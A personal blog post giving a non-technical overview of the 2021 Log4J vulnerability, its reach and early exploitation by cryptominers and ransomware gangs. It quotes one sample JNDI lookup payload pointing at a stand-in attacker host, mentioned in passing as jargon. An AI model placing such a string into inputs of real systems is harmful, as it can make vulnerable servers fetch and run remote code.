18 December 2021

Log4J — A Brief Overview

I haven't said anything about Log4J, because I've been trying to cut back on the technology posts. But the internet is basically on fire. Nightmare before Christmas: What to know about the Log4j vulnerability

There is some debate as to whether it is "log-4-jay" or "log-forge." I don't think it matters.

It is a big deal, perhaps the worst internet vulnerability ever, certainly the largest in the past decade.

The list of potential victims encompasses nearly a third of all web servers in the world, according to cybersecurity firm Cybereason. Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and one of the world's most popular video games, Minecraft count themselves among the slew of tech and industry giants running the popular software code that U.S. officials estimate have left hundreds of millions of devices exposed.

By Friday, more than 3,700,000 hacking attempts had been made to exploit the vulnerability, according to leading cybersecurity firm Checkpoint, with more than 46% conducted by known malicious groups.

Cryptominers jumped on the hack to start, but some of the ransomware gangs are already trying to leverage LOG4J as a way into vulnerable organizations. I'm sure they will be in the news shortly, if they aren't already.

If you have any interst in the technology of Log4J, you probably are already familiar with what it is exactly. If you aren't familiar, the link above does a fair job of explaining it. Most of the stuff I've turned up in searches jumps right into the deep end with a discusion of things like ${jndi:ldap://EEEvil.com:1389/EEEEvilPayload}, which you don't need to understand. Unless, of course, you do need to understand it.

Anyway, if you have friends in technology, they may be hard to get in touch with this week. You might consider that they are not snubbing you, they are just drowning in despair. Some moral support might not be a bad idea.

No comments:

Post a Comment

Comment Moderation is in place. Your comment will be visible as soon as I can get to it. Unless it is SPAM, and then it will never see the light of day.

Be Nice. Personal Attacks WILL be deleted. And I reserve the right to delete stuff that annoys me.